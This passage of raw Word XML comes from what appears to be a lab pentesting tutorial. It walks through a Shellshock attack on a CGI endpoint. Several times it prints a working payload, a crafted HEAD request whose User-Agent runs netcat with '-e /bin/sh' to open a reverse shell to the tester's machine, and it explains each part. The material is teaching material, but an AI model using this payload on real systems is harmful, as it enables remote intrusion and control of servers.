            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53865DAC" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:p w14:paraId="64C477B5" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility writes any specified operands, separated by single blank (` ') characters and followed by a newline (`\n') character, to the standard output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60314DFE" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="6CF14926" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:trPr>
          <w:trHeight w:val="242"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E89F10C" w14:textId="6E74DE21" w:rsidR="00BB3A74" w:rsidRPr="00A17BF9" w:rsidRDefault="00BB3A74" w:rsidP="002035B0">
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">echo -e </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">"HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>{ :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>;}; /usr/bin/nc</w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.64.10</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> | nc 192.168.64.</w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r w:rsidR="002035B0" w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="002035B0" w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26B73202" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:p w14:paraId="0B9CE447" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>This is the command we’re pushing through Echo into the NC command</w:t>
      </w:r>
      <w:r w:rsidR="00384C61">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  NC is used to throw the attack at the server.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770792DB" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42DE0A96" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>When the server processes the message, it will open up it’s own NC listener and try to connect back to your pentesting workstation</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17757FB2" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F90374E" w14:textId="5B48EB3E" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00384C61">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is comprised</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 4 parts</w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.  W</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">e’ll trim everything </w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">outside of the attack we’re sending and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>break it down</w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in detail</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA698F4" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="69186936" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4446BEF4" w14:textId="2D10A630" w:rsidR="00BB3A74" w:rsidRPr="00A17BF9" w:rsidRDefault="00BB3A74" w:rsidP="002035B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">"HEAD /cgi-bin/status </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc </w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.10 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68891CE6" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:p w14:paraId="6F268D0D" w14:textId="2785E48A" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>We’re hand crafting an HTTP request with this command.  “HEAD” is one of 8 methods for HTTP requests.  The HEAD method is used to retrieve information from the server for a given URI.  We are specifying the URI /cgi-bin/status.  This should make sense- remember that we found that as a vulnerable URI earlier?  (By the way- URI stands for</w:t>
      </w:r>
      <w:r w:rsidR="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uniform Resource Identifier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE2256" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="5B73F0D2" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14780567" w14:textId="6E437143" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="002035B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"HEAD /cgi-bin/status </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>HTTP/1.1\r\nUser-Agent:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> () { :;}; /usr/bin/nc </w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>192.168.64.10</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09EA8F2B" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:p w14:paraId="06832729" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Here, we’re specifying the HTTP protocol version we’re using, adding a return &amp; newline, and then specifying an empty user agent string.  Up to now, we’ve been setting up the attack, but now we’re going to pivot to the exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="487D1187" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70820EC2" w14:textId="20FD621A" w:rsidR="00BB3A74" w:rsidRPr="00FE006C" w:rsidRDefault="00BB3A74" w:rsidP="00845FE2">
            <w:pPr>
              <w:rPr>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE006C">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>"HEAD /cgi-bin/status HTTP/1.1\</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">r\nUser-Agent: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE006C">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="red"/>
              </w:rPr>
              <w:t>() { :;};</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE006C">
              <w:rPr>
                <w:b/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>/usr/bin/nc </w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>192.168.64.10</w:t>
            </w:r>
            <w:r w:rsidR="002035B0" w:rsidRPr="00A22CF7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01163500" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFBE304" w14:textId="355DADCE" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We’re in the beating heart of the </w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">!  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940FC21" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We declare a BASH environment variable with </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D153D9A" w14:textId="00F824A9" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We add an empty body for the function with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;};  Any commands that come</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> after this gets executed by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E91EF3" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="759BEBC5" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24554099" w14:textId="06123CC4" w:rsidR="00BB3A74" w:rsidRPr="00FE006C" w:rsidRDefault="00BB3A74" w:rsidP="005C247E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE006C">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>"HEAD /cgi-bin/status HTTP/1.1\r\nUser</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">-Agent: () { :;}; </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE006C">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>/usr/bin/nc </w:t>
            </w:r>
            <w:r w:rsidR="005C247E">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>192.168.64.10</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22CF7">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B0DBA0" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:p w14:paraId="0A70632F" w14:textId="77777777" w:rsidR="002475CC" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">And now we’re in the exploit- we’re specifying that we want </w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the server </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/usr/bin/nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(netcat) </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>when the environment variable is imported.  We’re telling t</w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>he server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E9D3E9" w14:textId="77777777" w:rsidR="002475CC" w:rsidRDefault="002475CC" w:rsidP="002475CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>to spawn a NC command</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947CA6E" w14:textId="77777777" w:rsidR="002475CC" w:rsidRDefault="002475CC" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tell NC on the server </w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>to connec</w:t>
      </w:r>
      <w:r w:rsidR="005C247E" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">t back to our pentesting laptop’s ip address </w:t>
      </w:r>
      <w:r w:rsidR="005C247E" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005C247E" w:rsidRPr="002475CC">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.64.10</w:t>
      </w:r>
      <w:r w:rsidR="005C247E" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 443.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B392D" w14:textId="77777777" w:rsidR="002475CC" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">pass anything that it receives from our pentesting netcat session to a program called /bin/sh.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7E38F" w14:textId="77777777" w:rsidR="002475CC" w:rsidRDefault="002475CC" w:rsidP="002475CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540E0881" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB3A74" w:rsidP="002475CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>This allows us to execute commands on the webserver.  Then w</w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>e close out the request with a Host header, which is required to complete the HEAD request. Then the double \r\n is a carriage return&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">newline combination.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7A4CC" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695" w:rsidP="002475CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA5AC7A" w14:textId="3969192D" w:rsidR="00BB3A74" w:rsidRPr="002475CC" w:rsidRDefault="00BB3A74" w:rsidP="002475CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Remember h</w:t>
      </w:r>
      <w:r w:rsidR="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ow we set up our catcher’s glove </w:t>
      </w:r>
      <w:r w:rsidRPr="002475CC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>with netcat?  The server’s about to throw the ball at us.  This is the end of the string we are using with ECHO section, so let’s go back to the original command and read the rest of it:</w:t>
